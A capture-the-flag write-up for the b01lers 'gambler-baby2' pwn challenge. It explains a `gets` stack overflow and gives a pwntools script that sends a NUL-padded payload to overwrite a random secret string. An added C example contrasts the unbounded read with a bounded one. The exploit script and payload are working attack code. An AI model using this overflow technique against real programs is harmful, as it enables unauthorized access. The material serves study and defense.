Tags: pwn overflow 

The binary reads the guess with `gets`, which performs no bounds checking on its destination (`var_20` below). We can abuse this to overflow into the local variable containing the random string.

```
0000158d printf(format: "Guess me a string of length 4 wi…")
0000159e gets(buf: &var_20)
000015b6 printf(format: "Your guess: %s\n", &var_20)
```

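```python
from pwn import *

# p = process('./gambler-baby2')  # uncomment to test against the local binary
p = remote('ctf.b01lers.com', 9203)

# gets() does not stop at NUL bytes, so every b'A\0' pair is written out and
# the payload runs past the guess buffer (var_20) into the random string.
data = b'A\0'*8 + b'A\0'*8

while True:
    p.sendline(data)
    print(p.recvline())

p.interactive()
```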
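The same overflow seen from the defender's side, as an added example that is not code from the challenge binary or the original writeup: a model of the unbounded `gets` read next to a bounded read that rejects over-long input. The struct layout, the 16-byte sizes, the `strcmp` comparison, the stand-in secret `q7Zk` and all function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed layout: guess buffer directly below the random string. */
struct frame { char guess[16]; char secret[16]; };

/* Constructed input: the same 32 bytes the script on this page sends. */
static const char PAYLOAD[] = "A\0A\0A\0A\0A\0A\0A\0A\0"
                              "A\0A\0A\0A\0A\0A\0A\0A\0";
#define PAYLOAD_LEN (sizeof PAYLOAD - 1)

/* Models gets(): copies up to '\n', ignores the size of guess and does not
   stop at NUL. Clamped to the frame so the demo itself stays well defined. */
static void read_like_gets(struct frame *f, const char *in, size_t n) {
    char *dst = (char *)f;
    size_t i = 0;
    for (; i < n && in[i] != '\n' && i < sizeof *f - 1; i++)
        dst[i] = in[i];
    dst[i] = '\0';
}

/* Bounded read (the role fgets(dst, cap, stdin) plays): stores at most
   cap-1 bytes and returns 1 when the line did not fit, so it can be rejected. */
static int read_bounded(char *dst, size_t cap, const char *in, size_t n) {
    size_t i = 0;
    for (; i < n && in[i] != '\n' && i < cap - 1; i++)
        dst[i] = in[i];
    dst[i] = '\0';
    return i < n && in[i] != '\n';
}

/* Each returns 1 if the guess is accepted (strcmp check is an assumption). */
int accepted_with_gets_model(void) {
    struct frame f = { "", "q7Zk" };   /* constructed stand-in secret */
    read_like_gets(&f, PAYLOAD, PAYLOAD_LEN);
    return strcmp(f.guess, f.secret) == 0;
}

int accepted_with_bounded_read(void) {
    struct frame f = { "", "q7Zk" };
    int too_long = read_bounded(f.guess, sizeof f.guess, PAYLOAD, PAYLOAD_LEN);
    return !too_long && strcmp(f.guess, f.secret) == 0;
}

int main(void) {
    printf("gets model accepted:   %d\n", accepted_with_gets_model());
    printf("bounded read accepted: %d\n", accepted_with_bounded_read());
    return 0;
}
```

With the unbounded read both strings end up as `"A"` and compare equal; with the bounded read the secret is untouched and the over-long line is rejected.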

Original writeup (https://github.com/tj-oconnor/ctf-writeups/tree/main/b01lers_ctf/gambler_overflow).